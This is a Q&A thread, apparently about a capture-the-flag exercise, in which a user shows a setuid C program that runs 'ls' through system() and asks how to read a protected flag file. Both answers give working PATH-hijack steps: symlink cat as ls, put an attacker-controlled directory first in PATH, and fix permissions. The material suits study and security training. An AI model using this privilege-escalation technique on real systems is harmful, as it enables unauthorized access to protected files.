How to convert 'ls' command to 'cat' command?

Question

I am trying to solve this problem, I am only allowed to run ls command and my objective is to read the flag. There is a vulnerable C code which has setuid.

    -rwsr-sr-x 1 lameprogrammer lameprogrammer 8579 Sep 15 07:21 vul_c
    -rw-r----- 1 lameprogrammer lameprogrammer  154 Sep 15 07:40 flag

I am user attacker and I have to read this flag file. The given C code is

    #include <stdlib.h>
    #include <stdio.h>

    #define FILENAME "/var/challenges/attacker/challenge1/flag"

    int main(void)
    {
        int vert;
        vert = system("ls " FILENAME);
        if(!vert)
            puts("Flag is at " FILENAME " :P ");
        else
            puts("Sorry! no file is there");
    }

I was trying to convert ls into cat so that if that runs then it will read the flag file. To do that I copied all the bin folder into my local space and then I replaced ls with cat and then exported the new PATH. Technically it should replace and my ls command should work like cat but it is not working. The following are my command :

   cp -r /bin /home/attacker
   cd /home/attacker/bin
   rm ls
   cp cat ls
   export PATH=/home/attacker/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/usr/games

The ls command is not working as cat and output is:

   ls: unrecognized option '--color=auto'
   Try 'ls --help' for more information.

When I am trying to run ./vul_c it says permission denied and then it is printing Sorry! no file is there.

Any help onto this would be great.

Answer 1

You are in the right direction but you are just putting too much effort for this small thing. Instead of creating a program why don't you create a symlink and then point this to cat.

Try this step:

   ln -s /bin/cat ls

Finally, export this and I hope you will be done with your solution. In this, you don't even have to worry about permission. Let me know if it works.

Answer 2

Does the program work? The problem as I see it is that if you use ls in the shell, is that it has an alias that will enable the colouring, i.e. something like

alias ls='ls --color=auto'

Now this is something that cat wouldn't understand. But it would be only for your shell, not the ls command run by that script, because it wouldn't use the aliases. Perhaps something like unalias ls would help in the shell.

Now, the system function cannot run your ls because it doesn't have proper rights - you forgot to chmod +x ls.